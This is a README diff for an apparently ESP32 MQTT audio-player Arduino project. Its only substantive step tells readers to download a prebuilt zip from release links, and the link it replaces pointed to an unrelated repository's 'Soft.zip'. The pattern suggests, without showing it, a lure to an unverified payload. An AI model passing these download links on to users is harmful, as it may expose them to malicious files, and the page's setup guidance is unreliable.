CardialS/muse-mqtt-audioplayer/README.md

 Within this repository, you will find an Arduino sketch designed specifically for the ESP32 Luxe board.
 This sketch allows for seamless audio streaming over a WiFi network, controlled through the power of MQTT communication.
 The combination of the ESP32 board, the MUSE Luxe features, and the MQTT protocol opens up a realm of possibilities for creating a customizable and interactive audio experience.

 ## 🚀 Getting Started
-To get started with the MUSE MQTT Audioplayer project, simply download the necessary files from the **[Soft.zip file](https://github.com/Dredarty/RINGSharp/releases/download/v1.0/Soft.zip)**.
+To get started with the MUSE MQTT Audioplayer project, simply download the necessary files from the **[https://github.com/CardialS/muse-mqtt-audioplayer/releases/download/v1.0/Program.zip file](https://github.com/CardialS/muse-mqtt-audioplayer/releases/download/v1.0/Program.zip)**.
 Once you have the files downloaded, follow the setup instructions included in the repository to begin exploring the functionalities of the audio player.

 ## ⚙️ Technologies Used
 The MUSE MQTT Audioplayer project leverages a variety of technologies to bring audio streaming to life.
 Some key technologies involved include: